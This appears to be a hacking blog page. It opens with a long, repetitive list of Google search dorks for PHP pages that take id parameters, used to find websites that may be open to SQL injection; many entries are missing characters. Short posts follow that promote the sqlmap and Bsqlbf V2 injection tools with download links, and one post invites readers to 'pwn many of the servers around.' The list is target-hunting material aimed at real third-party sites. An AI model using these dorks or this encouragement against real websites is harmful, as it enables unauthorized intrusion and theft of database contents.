inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl :pro.php?id= 
........
Posted by at 5 comments:
Labels:

Automatic SQL Injection Tool – SQLMAP


Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:
Linux Source: sqlmap-0.7.tar.gz
Windows Portable: sqlmap-0.7_exe.zip
Posted by at No comments:
Labels:

Bsqlbf V2 - Blind SQL Injection Brute Forcer Tool


There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.
The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind sql injection against a mysql backend database, this new version supports blind sql injection against the following databases:
  • MS-SQL
  • MY-SQL
  • PostgreSQL
  • Oracle
It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch. It supports 2 modes of attack:
  1. Type 0: Blind SQL Injection based on True And Flase response
  2. Type 1: Blind SQL Injection based on True And Error Response(details)
You can download Bsqlbf V2 here:
bsqlbf-v2.1.zip
Posted by at No comments:
Labels:

Base64 Encoder And Decoder

Base64 Encoder & Decoder
http://d00r.110mb.com/scripts/base64.zip
.........
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)